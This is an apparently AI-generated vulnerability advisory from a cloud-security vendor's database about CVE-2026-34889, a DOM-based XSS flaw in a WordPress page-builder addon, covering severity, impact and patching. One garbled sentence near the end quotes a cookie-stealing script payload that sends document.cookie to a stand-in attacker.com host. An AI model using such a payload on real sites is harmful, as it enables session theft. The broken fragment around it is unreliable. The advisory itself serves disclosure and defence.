
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-34889 is a DOM-Based Cross-Site Scripting (XSS) vulnerability in the Ultimate Addons for WPBakery Page Builder WordPress plugin developed by Brainstorm Force. It affects all plugin versions prior to 3.21.4 and was disclosed on April 1, 2026, by Patchstack (credited to researcher "Bonds"). The vulnerability carries a CVSS v3.1 base score of 6.5 (Medium) (Patchstack, Github Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting) and specifically manifests as DOM-Based XSS, meaning malicious payloads are processed and executed within the browser's DOM rather than being reflected or stored server-side (Github Advisory). Exploitation requires an authenticated user with at least Contributor-level privileges to inject a malicious script, and successful execution additionally requires a victim user to interact with the crafted content (e.g., visiting a page containing the payload) (Patchstack). The attack vector is network-based with low attack complexity, and the scope is changed, indicating the injected script can affect resources beyond the vulnerable component itself.
Successful exploitation allows authenticated low-privilege users to inject malicious JavaScript into pages rendered by the WPBakery Page Builder, which executes in the browsers of site visitors. This can result in theft of session cookies or credentials, unauthorized actions performed on behalf of affected users, defacement or modification of page content, and redirection to malicious sites. The CVSS scoring reflects low-to-moderate impacts on confidentiality, integrity, and availability, with a changed scope indicating potential cross-component effects (Patchstack, Github Advisory).
As of the time of disclosure, there is no public proof-of-concept exploit and no evidence of in-the-wild exploitation (Feedly). The EPSS score is approximately 0.033% (0.000330), placing it in the 3rd percentile for exploitation likelihood within the next 30 days (Github Advisory). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack notes that vulnerabilities of this class are sometimes used in mass-exploit campaigns targeting WordPress sites at scale, regardless of site popularity (Patchstack).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) within a plugin parameter that is insufficiently sanitized.wp_posts table).The primary remediation is to update Ultimate Addons for WPBakery Page Builder to version 3.21.4 or later, which contains the fix for this vulnerability (Patchstack). As interim mitigations, site administrators should restrict page-editing privileges to trusted users only, and consider implementing Content Security Policy (CSP) headers to reduce the impact of any XSS exploitation. Patchstack users can enable auto-update for vulnerable plugins to receive protection automatically.
The vulnerability was reported to Patchstack by researcher "Bonds" on February 16, 2026, and publicly disclosed on April 1, 2026, following responsible disclosure practices (Patchstack). Patchstack classified the vulnerability as low priority with no impactful threat observed at the time of publication. No significant broader media coverage or notable researcher commentary beyond the initial advisory has been identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."